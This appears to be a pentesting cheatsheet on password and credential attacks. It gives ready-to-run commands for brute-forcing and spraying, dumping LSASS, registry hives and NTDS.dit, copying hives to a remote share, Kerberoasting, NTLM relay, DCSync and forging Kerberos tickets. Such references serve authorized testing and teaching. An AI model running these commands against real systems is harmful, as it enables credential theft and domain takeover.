daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

password-attacks.md (22090B)


      1 ---
      2 title: "Password Attacks & Brute Forcing"
      3 description: "Online/offline password attacks: Hydra/Medusa service brute-forcing, spraying, mutations and defaults."
      4 category: password-attacks
      5 tags: [password-attacks, brute-force, spraying]
      6 tools: [Hydra, Medusa, CrackMapExec]
      7 difficulty: intermediate
      8 updated: "2026-08-09"
      9 source: "repo:Password-Attacks/Password_Attacks_Cheat_Sheet.pdf"
     10 ---
     11 
     12 # Password Attacks & Brute Forcing
     13 
     14 A comprehensive reference for password attack methodologies in authorized penetration testing: connecting to targets, building wordlists, remote and local credential attacks, hash cracking, and advanced Active Directory techniques.
     15 
     16 > **Note — Impacket packaging.** Modern Impacket installs its example scripts with an `impacket-` prefix (`impacket-secretsdump`, `impacket-GetUserSPNs`, `impacket-GetNPUsers`, `impacket-ntlmrelayx`, `impacket-smbserver`, `impacket-psexec`, `impacket-getST`, `impacket-findDelegation`). The `python3 <script>.py` forms below still work from a source checkout.
     17 
     18 ## Key Concepts
     19 
     20 | Attack | Description |
     21 | --- | --- |
     22 | Brute force | Systematically trying all possible password combinations |
     23 | Dictionary | Using wordlists of common passwords |
     24 | Credential stuffing | Reusing compromised credentials across services |
     25 | Pass-the-Hash | Using password hashes without cracking them |
     26 | Password spraying | Trying common passwords against many accounts |
     27 | Hash cracking | Converting password hashes back to plaintext |
     28 
     29 ### Tools Overview
     30 
     31 | Tool | Primary Use |
     32 | --- | --- |
     33 | Hydra | Network protocol brute-forcing |
     34 | NetExec | Windows network authentication testing (formerly CrackMapExec) |
     35 | Hashcat | GPU-accelerated hash cracking |
     36 | John the Ripper | CPU-based hash cracking |
     37 | Mimikatz | Windows credential extraction |
     38 | Pypykatz | Python-based LSASS parsing |
     39 
     40 ## 1. Connecting to Target
     41 
     42 ```bash
     43 # RDP (xfreerdp)
     44 xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!
     45 
     46 # WinRM (Evil-WinRM) — supports pass-the-hash, PowerShell session
     47 evil-winrm -i <ip> -u user -p password
     48 
     49 # SSH
     50 ssh user@<ip>
     51 
     52 # SMB share (smbclient)
     53 smbclient -U user \\\\<ip>\\SHARENAME
     54 
     55 # Host an SMB share on the attack host (file transfer)
     56 python3 smbserver.py -smb2support CompData /home/<user>/Documents/
     57 
     58 # SSH SOCKS proxy for pivoting
     59 ssh -D 9050 user@<ip>
     60 proxychains xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!
     61 ```
     62 
     63 ## 2. Password Mutations & Custom Wordlists
     64 
     65 ```bash
     66 # CeWL — scrape a website for keywords (-d depth, -m min length, --lowercase, -w output)
     67 cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
     68 
     69 # Hashcat rule-based mutations (append numbers, capitalize, leetspeak, specials)
     70 hashcat --force password.list -r custom.rule --stdout > mut_password.list
     71 
     72 # Username-Anarchy — generate username permutations from first/last names
     73 ./username-anarchy -i /path/to/listoffirstandlastnames.txt
     74 
     75 # Build a compressed-file-extension list for file hunting
     76 curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt
     77 ```
     78 
     79 Common mutation rules: append numbers (`password` -> `password123`), capitalize first letter, leetspeak (`password` -> `p@ssw0rd`), append specials (`password!`), reverse (`drowssap`).
     80 
     81 Generated username formats: `john.smith`, `j.smith`, `johns`, `john_smith`, `smithj`, `jsmith`.
     82 
     83 > **Critical — tailor wordlists to the target.** Include company name/variations, product and service names, locations, industry terminology, common patterns (`Summer2024!`, `Welcome123`), OSINT employee names, and (when legally authorized) historical breach data. Generic wordlists have far lower success rates.
     84 
     85 ## 3. Remote Password Attacks
     86 
     87 ### NetExec (formerly CrackMapExec)
     88 
     89 ```bash
     90 # WinRM brute force
     91 netexec winrm <ip> -u user.list -p password.list
     92 
     93 # SMB share enumeration with creds
     94 netexec smb <ip> -u "user" -p "password" --shares
     95 
     96 # Dump SAM (requires admin)
     97 netexec smb <ip> --local-auth -u <username> -p <password> --sam
     98 
     99 # Dump LSA secrets (may contain cleartext creds / service passwords)
    100 netexec smb <ip> --local-auth -u <username> -p <password> --lsa
    101 
    102 # Dump NTDS.dit (Domain Controller only — full domain compromise)
    103 netexec smb <ip> -u <username> -p <password> --ntds
    104 ```
    105 
    106 ### Hydra — Multi-Protocol Brute Forcing
    107 
    108 ```bash
    109 # Username + password lists
    110 hydra -L user.list -P password.list <service>://<ip>
    111 
    112 # Single username, password list
    113 hydra -l username -P password.list <service>://<ip>
    114 
    115 # Single password, user list (spraying)
    116 hydra -L user.list -p password <service>://<ip>
    117 
    118 # Credential stuffing (user:pass pairs per line)
    119 hydra -C <user_pass.list> ssh://<IP>
    120 ```
    121 
    122 Supported services/ports: SSH (22), FTP (21), HTTP/HTTPS (80/443), SMB (445), RDP (3389), MySQL (3306), PostgreSQL (5432), MSSQL (1433), and many more.
    123 
    124 ### Pass-the-Hash & Network Credential Extraction
    125 
    126 ```bash
    127 # Pass-the-Hash with Evil-WinRM (NTLM hash instead of password)
    128 evil-winrm -i <ip> -u Administrator -H "<passwordhash>"
    129 
    130 # Extract credentials from a packet capture
    131 ./Pcredz -f demo.pcapng -t -v
    132 ```
    133 
    134 Pass-the-Hash requirements: an NTLM hash (from SAM, NTDS, or memory dump), a target that accepts NTLM authentication, administrative privileges (recommended), and network connectivity.
    135 
    136 ## 4. Windows Local Password Attacks
    137 
    138 ### Process Enumeration & LSASS Dumping
    139 
    140 ```powershell
    141 # List processes and services
    142 tasklist /svc
    143 
    144 # Identify the LSASS process (note the PID)
    145 Get-Process lsass
    146 
    147 # Dump LSASS memory with comsvcs.dll (replace 672 with the LSASS PID; admin/SYSTEM)
    148 rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
    149 
    150 # Parse the dump offline with Pypykatz
    151 pypykatz lsa minidump /path/to/lsassdumpfile
    152 ```
    153 
    154 ### Registry Hive Extraction
    155 
    156 ```powershell
    157 # Save SAM, SECURITY, SYSTEM hives (admin)
    158 reg.exe save hklm\sam C:\sam.save
    159 reg.exe save hklm\security C:\security.save
    160 reg.exe save hklm\system C:\system.save
    161 
    162 # Move to a network share
    163 move sam.save \\<ip>\NameofFileShare
    164 move security.save \\<ip>\NameofFileShare
    165 move system.save \\<ip>\NameofFileShare
    166 ```
    167 
    168 ```bash
    169 # Extract hashes from the saved hives (Impacket)
    170 python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
    171 ```
    172 
    173 ### NTDS.dit Extraction (Domain Controller)
    174 
    175 ```powershell
    176 # Create a volume shadow copy (Domain Admin or equivalent)
    177 vssadmin CREATE SHADOW /For=C:
    178 
    179 # Copy NTDS.dit from the shadow copy (replace the shadow identifier from vssadmin output)
    180 cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
    181 # Also extract the SYSTEM hive for the decryption keys.
    182 ```
    183 
    184 ### Credential Manager
    185 
    186 ```powershell
    187 # Open the Credential Manager GUI
    188 rundll32 keymgr.dll,KRShowKeyMgr
    189 
    190 # List saved credentials in the current profile
    191 cmdkey /list
    192 
    193 # Launch cmd.exe as a stored user (works if creds saved with /savecred — no password needed)
    194 runas /savecred /user:<username> cmd
    195 ```
    196 
    197 ### File & Share Hunting
    198 
    199 ```powershell
    200 # Search files for the string "password"
    201 findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
    202 
    203 # Snaffler — search network shares for sensitive files/creds
    204 snaffler.exe -s
    205 
    206 # PowerShell share hunting
    207 Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public
    208 ```
    209 
    210 ### Key Windows Credential Locations
    211 
    212 | Location | Contains | Privileges |
    213 | --- | --- | --- |
    214 | LSASS Memory | NTLM hashes, cleartext passwords, Kerberos tickets | Admin |
    215 | SAM Registry | Local user NTLM hashes | Admin |
    216 | LSA Secrets | Service account passwords, cached credentials | Admin |
    217 | NTDS.dit | All domain user password hashes | Domain Admin |
    218 | Credential Manager | Stored credentials for various services | User/Admin |
    219 
    220 ## 5. Linux Local Password Attacks
    221 
    222 ### Configuration, Database & Document Hunting
    223 
    224 ```bash
    225 # Find configuration files
    226 for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
    227 
    228 # Search config files for credentials (skip commented lines)
    229 for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done
    230 
    231 # Find database files
    232 for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done
    233 
    234 # Text / script / document files
    235 find /home/* -type f -name "*.txt" -o ! -name "*.*"
    236 for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done
    237 for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
    238 ```
    239 
    240 ### Cron, SSH Keys, Bash History
    241 
    242 ```bash
    243 cat /etc/crontab
    244 ls -la /etc/cron.*/
    245 
    246 # SSH keys system-wide / in home dirs / public keys
    247 grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
    248 grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
    249 grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"
    250 
    251 # Bash history
    252 tail -n5 /home/*/.bash*
    253 ```
    254 
    255 ### Memory & Browser Credential Extraction
    256 
    257 ```bash
    258 # Mimipenguin — plaintext creds from memory
    259 python3 mimipenguin.py
    260 bash mimipenguin.sh
    261 
    262 # LaZagne — recover creds from browsers, email clients, databases
    263 python2.7 lazagne.py all
    264 python3 lazagne.py browsers
    265 
    266 # Firefox stored credentials
    267 ls -l .mozilla/firefox/ | grep default
    268 cat .mozilla/firefox/1bp1pd86.default-release/logins.json | jq .
    269 python3.9 firefox_decrypt.py
    270 ```
    271 
    272 ### Key Linux Credential Locations
    273 
    274 | Location | Contents | Risk |
    275 | --- | --- | --- |
    276 | `/etc/shadow` | Hashed user passwords (SHA-512, MD5) | Critical |
    277 | `~/.ssh/` | SSH private keys | Critical |
    278 | `~/.bash_history` | Command history with credentials | High |
    279 | `*.conf`, `*.config` | Application credentials | High |
    280 | `~/.mozilla` | Firefox stored passwords | Medium |
    281 | `/var/log/` | Log files with authentication data | Medium |
    282 | `*.py`, `*.sh` | Scripts with hardcoded credentials | High |
    283 
    284 ## 6. Cracking Passwords
    285 
    286 ### Hash Identification
    287 
    288 Common formats: MD5 (32 hex), NTLM (32 hex, same length as MD5), SHA-1 (40 hex), SHA-256 (64 hex), bcrypt (starts `$2a$`/`$2b$`/`$2y$`), SHA-512 Unix (starts `$6$`).
    289 
    290 ### Impacket Secretsdump
    291 
    292 ```bash
    293 # Local registry hives (SYSTEM holds the boot key to decrypt SAM/SECURITY)
    294 python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
    295 
    296 # Remote SAM over the network (admin creds; no disk touch)
    297 python3 secretsdump.py 'DOMAIN/user:password@<target-ip>'
    298 
    299 # NTDS.dit remotely from a DC (all domain hashes — Domain Admin)
    300 python3 secretsdump.py 'DOMAIN/Administrator:password@<dc-ip>' -just-dc
    301 
    302 # Specific user only (e.g. krbtgt for Golden Ticket)
    303 python3 secretsdump.py 'DOMAIN/Administrator:password@<dc-ip>' -just-dc-user krbtgt
    304 
    305 # Pass-the-Hash (LM:NTLM, or leave LM empty with a leading colon)
    306 python3 secretsdump.py 'DOMAIN/Administrator@<target-ip>' -hashes :aad3b435b51404eeaad3b435b51404ee
    307 
    308 # Offline NTDS.dit (requires the SYSTEM hive too)
    309 python3 secretsdump.py -ntds ntds.dit -system system.hive LOCAL
    310 
    311 # Save output to files (hashes.ntds, hashes.ntds.kerberos, hashes.ntds.cleartext)
    312 python3 secretsdump.py 'DOMAIN/user:password@<target>' -just-dc -outputfile hashes
    313 ```
    314 
    315 | Option | Description |
    316 | --- | --- |
    317 | `-just-dc` | Extract NTDS.dit only (skip SAM/LSA) |
    318 | `-just-dc-ntlm` | Extract only NTLM hashes, skip Kerberos |
    319 | `-just-dc-user USERNAME` | Extract a specific user only |
    320 | `-history` | Include password history hashes |
    321 | `-user-status` | Show if an account is enabled/disabled |
    322 | `-pwd-last-set` | Show password-last-set timestamp |
    323 | `-exec-method METHOD` | Use smbexec, wmiexec, or mmcexec |
    324 | `-use-vss` | Use Volume Shadow Copy for extraction |
    325 
    326 ### Hashcat — GPU-Accelerated Cracking
    327 
    328 ```bash
    329 # NTLM (mode 1000) with wordlist
    330 hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt
    331 
    332 # Show the cracked plaintext for a hash
    333 hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show
    334 
    335 # Linux shadow (SHA-512, mode 1800) — combine passwd + shadow first
    336 unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes
    337 hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked
    338 
    339 # MD5 (mode 500 = md5crypt)
    340 hashcat -m 500 -a 0 md5-hashes.list rockyou.txt
    341 
    342 # BitLocker (mode 22100)
    343 hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked
    344 ```
    345 
    346 | Mode | Hash Type | Notes |
    347 | --- | --- | --- |
    348 | 0 | MD5 | Extremely fast, weak |
    349 | 100 | SHA-1 | Fast, deprecated |
    350 | 1000 | NTLM | Windows password hashes |
    351 | 1800 | SHA-512 (Unix) | Linux `/etc/shadow` |
    352 | 3200 | bcrypt | Modern, intentionally slow |
    353 | 5600 | NetNTLMv2 | Network authentication captures |
    354 | 13100 | Kerberos TGS | Kerberoasting |
    355 | 22000 | WPA/WPA2 | WiFi cracking |
    356 | 22100 | BitLocker | Full disk encryption |
    357 
    358 Attack modes: `-a 0` straight (dictionary), `-a 1` combination, `-a 3` brute-force/mask, `-a 6` hybrid wordlist+mask, `-a 7` hybrid mask+wordlist.
    359 
    360 ### John the Ripper — File & Hash Cracking
    361 
    362 ```bash
    363 # SSH private key
    364 python3 ssh2john.py SSH.private > ssh.hash
    365 john ssh.hash --show
    366 
    367 # Microsoft Office document
    368 office2john.py Protected.docx > protecteddocx.hash
    369 john --wordlist=rockyou.txt protecteddocx.hash
    370 
    371 # PDF
    372 pdf2john.pl PDF.pdf > pdf.hash
    373 john --wordlist=rockyou.txt pdf.hash
    374 
    375 # ZIP archive
    376 zip2john ZIP.zip > zip.hash
    377 john --wordlist=rockyou.txt zip.hash
    378 
    379 # BitLocker volume (from VHD)
    380 bitlocker2john -i Backup.vhd > backup.hashes
    381 ```
    382 
    383 ### OpenSSL-Encrypted Archive
    384 
    385 ```bash
    386 file GZIP.gzip     # identify the file type
    387 # Brute force an OpenSSL-encrypted archive with a wordlist
    388 for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done
    389 ```
    390 
    391 > **Tip — cracking strategy.** 1) Start with common passwords (top 10k). 2) Apply rule-based mutations. 3) Use targeted, organization-specific wordlists. 4) Try hybrid attacks (wordlist + masks). 5) Reserve pure brute-force as a last resort. Relative crack speed (fastest first): MD5 > NTLM > SHA-1 > SHA-256 > SHA-512 > bcrypt.
    392 
    393 Wordlist resources: `/usr/share/wordlists/rockyou.txt`, `/usr/share/seclists/`, `/usr/share/wordlists/`, plus custom lists from CeWL / username-anarchy / mutations.
    394 
    395 ## 7. Advanced Attack Techniques
    396 
    397 ### Kerberoasting
    398 
    399 ```bash
    400 # Request TGS tickets for all SPNs
    401 python3 GetUserSPNs.py DOMAIN/user:password -dc-ip <DC-IP> -request
    402 
    403 # Save directly in hashcat format
    404 python3 GetUserSPNs.py DOMAIN/user:password -dc-ip <DC-IP> -request -outputfile kerberoast.hash
    405 
    406 # Crack (mode 13100 = RC4-HMAC / Kerberos 5 TGS-REP etype 23; faster than AES)
    407 hashcat -m 13100 kerberoast.hash rockyou.txt
    408 ```
    409 
    410 ### AS-REP Roasting
    411 
    412 ```bash
    413 # Target accounts with "Do not require Kerberos preauthentication"
    414 python3 GetNPUsers.py DOMAIN/ -dc-ip <DC-IP> -usersfile users.txt -format hashcat -outputfile asrep.hash
    415 
    416 # Crack (mode 18200)
    417 hashcat -m 18200 asrep.hash rockyou.txt
    418 ```
    419 
    420 > **Warning —** AS-REP Roasting does not require valid credentials; vulnerable accounts can be enumerated without authentication if LDAP allows anonymous binds.
    421 
    422 ### Password Spraying
    423 
    424 > **Critical — account lockout awareness.** Identify the lockout threshold (typically 3-5 attempts) and duration (typically 15-30 minutes), calculate safe spray intervals, and monitor for lockouts during testing.
    425 
    426 ```bash
    427 # Smart spray across hosts (--continue-on-success tests all combos)
    428 netexec smb targets.txt -u users.txt -p 'Password123!' --continue-on-success
    429 
    430 # Time-based spray with delays between attempts
    431 for pass in $(cat passwords.txt); do
    432     echo "[+] Trying password: $pass"
    433     netexec smb 10.10.10.10 -u users.txt -p "$pass"
    434     echo "[*] Sleeping 30 minutes to avoid lockout..."
    435     sleep 1800
    436 done
    437 ```
    438 
    439 ### DCSync
    440 
    441 ```bash
    442 # Mimikatz
    443 mimikatz # lsadump::dcsync /domain:DOMAIN.COM /user:Administrator
    444 mimikatz # lsadump::dcsync /domain:DOMAIN.COM /all
    445 
    446 # Impacket
    447 python3 secretsdump.py DOMAIN/user:password@DC-IP -just-dc
    448 ```
    449 
    450 > **Critical —** DCSync requires Replicating Directory Changes (and All) permissions — typically Domain Admins, Enterprise Admins, or accounts with specific delegation rights.
    451 
    452 ### Responder & NTLM Relay
    453 
    454 ```bash
    455 # Poison LLMNR/NBT-NS to capture NetNTLMv2
    456 sudo responder -I eth0 -wFv
    457 hashcat -m 5600 captured.hash rockyou.txt
    458 
    459 # Relay captured auth to a target (requires SMB signing disabled)
    460 python3 ntlmrelayx.py -tf targets.txt -smb2support
    461 python3 ntlmrelayx.py -t 10.10.10.10 -smb2support -c "whoami"
    462 ```
    463 
    464 ### Golden & Silver Tickets
    465 
    466 ```bash
    467 # Golden Ticket (requires krbtgt hash; valid up to 10 years by default)
    468 mimikatz # kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /krbtgt:<KRBTGT_HASH> /id:500 /ptt
    469 
    470 # Silver Ticket (service account hash; stealthier, limited to one service)
    471 mimikatz # kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /target:SERVER.DOMAIN.COM /service:CIFS /rc4:<SERVICE_HASH> /ptt
    472 ```
    473 
    474 ### Pass-the-Ticket (PtT)
    475 
    476 ```bash
    477 # Export / import tickets with Mimikatz
    478 mimikatz # sekurlsa::tickets /export
    479 mimikatz # kerberos::ptt ticket.kirbi
    480 
    481 # Use a ticket with Impacket
    482 export KRB5CCNAME=/path/to/ticket.ccache
    483 python3 psexec.py -k -no-pass DOMAIN/user@target.domain.com
    484 ```
    485 
    486 ### Constrained Delegation Abuse
    487 
    488 ```bash
    489 python3 findDelegation.py DOMAIN/user:password -dc-ip DC-IP
    490 python3 getST.py -spn CIFS/target.domain.com -impersonate Administrator DOMAIN/service_account:password
    491 ```
    492 
    493 ### Credential Guard Bypass
    494 
    495 ```powershell
    496 # ProcDump may still dump protected LSASS (often needs system-level access)
    497 procdump64.exe -ma lsass.exe lsass.dmp
    498 ```
    499 
    500 > **Note — Protected Users group restrictions:** no NTLM authentication, no DES/RC4 in Kerberos pre-auth, no credential delegation, TGT lifetime limited to 4 hours, cannot authenticate with unconstrained delegation.
    501 
    502 ### Advanced Attack Tool Reference
    503 
    504 | Tool | Purpose | Type |
    505 | --- | --- | --- |
    506 | GetUserSPNs.py | Kerberoasting — extract service tickets | Impacket |
    507 | GetNPUsers.py | AS-REP Roasting — extract vulnerable hashes | Impacket |
    508 | Responder | LLMNR/NBT-NS poisoning | Python |
    509 | ntlmrelayx.py | NTLM credential relaying | Impacket |
    510 | Mimikatz | Credential extraction, ticket manipulation | Windows |
    511 | Rubeus | Kerberos abuse and ticket manipulation | C# |
    512 | BloodHound | Active Directory attack path visualization | Neo4j |
    513 | findDelegation.py | Identify delegation vulnerabilities | Impacket |
    514 
    515 > **Detection —** activities likely to trigger alerts: excessive Kerberos ticket requests (Kerberoasting), AS-REP requests for multiple accounts, DCSync from non-DC systems, NTLM relay against disabled SMB signing, unusual PowerShell execution, abnormal LSASS access, lateral movement via Pass-the-Hash.
    516 
    517 ## 8. Quick Reference
    518 
    519 ### Tool Selection Matrix
    520 
    521 | Target | Tool | Command |
    522 | --- | --- | --- |
    523 | SSH | Hydra | `hydra -L users -P pass.list ssh://IP` |
    524 | RDP | Hydra | `hydra -L users -P pass.list rdp://IP` |
    525 | WinRM | NetExec | `netexec winrm IP -u users -p pass.list` |
    526 | SMB | NetExec | `netexec smb IP -u user -p pass.list` |
    527 | FTP | Hydra | `hydra -l user -P pass.list ftp://IP` |
    528 | HTTP | Hydra | `hydra -l user -P pass.list http-post-form://IP` |
    529 
    530 ### Common Default Credentials
    531 
    532 | Service | Username | Password | Notes |
    533 | --- | --- | --- | --- |
    534 | MySQL | root | (empty) | Default on many installations |
    535 | PostgreSQL | postgres | postgres | Common default |
    536 | Tomcat | admin | admin | Default manager webapp |
    537 | Jenkins | admin | password | Common initial setup |
    538 | Admin panels | admin | admin | Generic web applications |
    539 | Router | admin | password | Consumer routers |
    540 
    541 ### Port Reference
    542 
    543 | Port | Service | Attack Vector |
    544 | --- | --- | --- |
    545 | 21 | FTP | Brute force, default credentials |
    546 | 22 | SSH | Brute force, key-based attacks |
    547 | 23 | Telnet | Brute force (cleartext) |
    548 | 445 | SMB | Pass-the-Hash, credential stuffing |
    549 | 3306 | MySQL | Brute force, default root account |
    550 | 3389 | RDP | Brute force, credential stuffing |
    551 | 5432 | PostgreSQL | Brute force, default postgres account |
    552 | 5985/5986 | WinRM | Pass-the-Hash, password spray |
    553 | 8080 | HTTP Alt | Web form attacks, default creds |
    554 
    555 ### CeWL Wordlist Generation
    556 
    557 ```bash
    558 cewl https://example.com -w wordlist.txt                       # basic scraping
    559 cewl https://example.com -d 5 -m 6 -w wordlist.txt             # deep crawl, min length 6
    560 cewl https://example.com -e --email_file emails.txt            # include email addresses
    561 cewl https://example.com -o --meta -w wordlist.txt             # follow external links + metadata
    562 ```
    563 
    564 ### Password Complexity Patterns
    565 
    566 Common patterns to include in wordlists: Season+Year (`Summer2024!`, `Winter2023!`), Company+Year (`Inlanefreight2024!`), Welcome+Number (`Welcome123!`, `Welcome2024`), Location+Special (`NewYork!`, `California123`), Password+Special (`Password1!`, `P@ssw0rd!`), Month+Year (`January2024`, `March2023!`).
    567 
    568 ### Essential Command Cheat Sheet
    569 
    570 ```bash
    571 # NetExec
    572 netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!'      # password spray
    573 netexec smb 10.10.10.10 -u admin -p pass --sam                 # dump SAM
    574 netexec smb dc.domain.com -u admin -p pass --ntds              # dump NTDS (DC)
    575 netexec smb 10.10.10.10 -u admin -H <NTLM_HASH>                # pass-the-hash
    576 
    577 # Hydra
    578 hydra -L users.txt -P pass.txt ssh://10.10.10.10
    579 hydra -l admin -P pass.txt 10.10.10.10 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
    580 hydra -l administrator -P pass.txt rdp://10.10.10.10
    581 hydra -L users.txt -p Password123 ftp://10.10.10.10
    582 
    583 # Hashcat
    584 hashcat -m 1000 hashes.txt rockyou.txt
    585 hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule
    586 hashcat -m 1800 shadow.txt rockyou.txt
    587 hashcat -m 1000 hashes.txt --show
    588 
    589 # Impacket secretsdump
    590 secretsdump.py -sam sam -security security -system system LOCAL
    591 secretsdump.py 'DOMAIN/user:pass@10.10.10.10'
    592 secretsdump.py 'DOMAIN/admin:pass@dc.domain.com' -just-dc
    593 secretsdump.py 'DOMAIN/admin@10.10.10.10' -hashes :NTLM_HASH
    594 ```